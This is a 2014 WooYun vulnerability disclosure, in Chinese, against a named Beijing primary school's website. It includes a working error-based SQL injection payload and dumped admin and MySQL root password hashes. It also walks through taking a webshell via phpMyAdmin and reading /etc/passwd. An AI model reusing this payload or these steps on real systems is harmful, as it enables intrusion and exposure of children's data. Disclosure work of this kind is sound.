漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-050250
漏洞标题:某几个小学各种漏洞大礼包(疑似北京乐知行软件有限公司某cms)服务器shell 信息侧漏
相关厂商:hdsyxx.net
漏洞作者: Haswell
提交时间:2014-02-04 10:49
修复时间:2014-03-21 10:50
公开时间:2014-03-21 10:50
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-02-04: 细节已通知厂商并且等待厂商处理中
2014-02-09: 厂商已经确认,细节仅向厂商公开
2014-02-19: 细节向核心白帽子及相关领域专家公开
2014-03-01: 细节向普通白帽子公开
2014-03-11: 细节向实习白帽子公开
2014-03-21: 细节向公众公开
简要描述:
学生狗关注wooyun好久,来拿个验证码,由于太弱太明显就在这里不多说了。。。。。。。。
据说母校官网找人开发改版了,来转悠转悠~~~~~~~~~~~~~~~~~~~--by Haswell
详细说明:
先是http://hdsyxx.net:85/phpinfo.php PHP 5.3.x < 5.3.13
各种信息的好去处
然后/admin, /includes, /icons,/session, /templates, /phpmyadmin, /eWebEditor,
/includes /icons,/session, /templates,/eWebEditor, 神马文件枚举就不说了
先看看/session
。。。我姑且先认为这是个失误。
然后hash拿到cmd5解密。。特莫第一次见管理员一位数密码。。。。
再来看后台/admin
登进去看到功能不多,貌似自己写的?
觉得这样不太光荣,回去重来。。
/ewebeditor 用户名密码admin
还没注册。。没钱帮你们注册拿shell也没细看
再回去重来
/search.php 直接吓尿
扔到sqlmap里,xx_user表里后台用户
Database: dmc20121030
Table: xx_user
[3 entries]
+---------+----------------------------------+-----------+------------+------------+------------+-------------+
| user_id | user_pass | user_name | user_type2 | user_type1 | user_email | user_email2 |
+---------+----------------------------------+-----------+------------+------------+------------+-------------+
| 1 | c4ca4238a0b923820dcc509a6f75849b | 居福 | 0 | 1 | 1 | <blank> |
| 2 | a87ff679a2f3e71d9181a67b7542122c | 海淀实验小学 | 0 | 0 | 4 | <blank> |
| 4 | f4e5947fc68554c78a536a7a44e0eb22 | 海淀实验小学 | 0 | 0 | cheng | <blank> |
+---------+----------------------------------+-----------+------------+------------+------------+-------------+
因为有phpmyadmin,懒得跑了,直接--passwords
Place: POST
Parameter: user_email
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: action=login&user_email=a' AND (SELECT 9404 FROM(SELECT COUNT(*),CONCAT(0x7173666b71,(SELECT (CASE WHEN (9404=9404) THEN 1 ELSE 0 END)),0x716d736671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ABpM'='ABpM&user_pass=a&x=76&y=10
---
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
database management system users password hashes:
[*] root [3]:
password hash: *2F82CB134B90797738744908CBAE6D08313C4686
password hash: *64705BDB659CD527A15F85992DCE56AD472B6F01
password hash: NULL
得到MySQL用户名密码
然后cmd5解密不谢
登陆phpmyadmin
导出一句话拿shell
/etc/passwd就好了
/admin还有一条路:直接
然后
再次吓尿
居然还有。。。。
对了找敏感路径还有一条路/robots.txt
Contents of robots.txt :
User-agent: *
Disallow: /admin/
Disallow: /eWebEditor/
Disallow: /images/
Disallow: /includes/
Disallow: /smtp/
Disallow: /templates/
Disallow: /templates_c/
Disallow: /uploadfile/
Disallow: /uploadimage/
Disallow: /css.css
Disallow: /style.css
xss很多,比如这里
已经有人来过了
这里当然也行。。。。
这些地方还多多少少附带注入。。。。。。
反射型一抓一大把不说了
因为有同服务器乐知行数字校园,大量祖国花朵信息外泄
同服务器的9998端口/cms今典小学官网www.bjhdjdxx.com/。。。为什么。。。。。
母校你种魔了。。。。。。。。
漏洞证明:
Database: dmc20121030
Table: xx_user
[3 entries]
+---------+----------------------------------+-----------+------------+------------+------------+-------------+
| user_id | user_pass | user_name | user_type2 | user_type1 | user_email | user_email2 |
+---------+----------------------------------+-----------+------------+------------+------------+-------------+
| 1 | c4ca4238a0b923820dcc509a6f75849b | 居福 | 0 | 1 | 1 | <blank> |
| 2 | a87ff679a2f3e71d9181a67b7542122c | 海淀实验小学 | 0 | 0 | 4 | <blank> |
| 4 | f4e5947fc68554c78a536a7a44e0eb22 | 海淀实验小学 | 0 | 0 | cheng | <blank> |
+---------+----------------------------------+-----------+------------+------------+------------+-------------+
Place: POST
Parameter: user_email
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: action=login&user_email=a' AND (SELECT 9404 FROM(SELECT COUNT(*),CONCAT(0x7173666b71,(SELECT (CASE WHEN (9404=9404) THEN 1 ELSE 0 END)),0x716d736671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ABpM'='ABpM&user_pass=a&x=76&y=10
---
web server operating system: Linux CentOS 6.3
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5.0
database management system users password hashes:
[*] root [3]:
password hash: *2F82CB134B90797738744908CBAE6D08313C4686
password hash: *64705BDB659CD527A15F85992DCE56AD472B6F01
password hash: NULL
导出一句话木马
菜刀连
修复方案:
过滤,该藏起来的藏起来,降权
还有看看他咋写的
话说在最底下看到 版权所有 设计维护:北京乐知行软件有限公司,不知道cms是不是乐知行写的。。。J几个小学在用不知道算不算通用型==(估计不是)
**捉住那个码农让他回来上咱小学的计算机课。还有求下次回学校看老师不被保安驱逐。
//第一次wooyun好激动。。。。。。。==
版权声明:转载请注明来源 Haswell@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-02-09 09:32
厂商回复:
最新状态:
暂无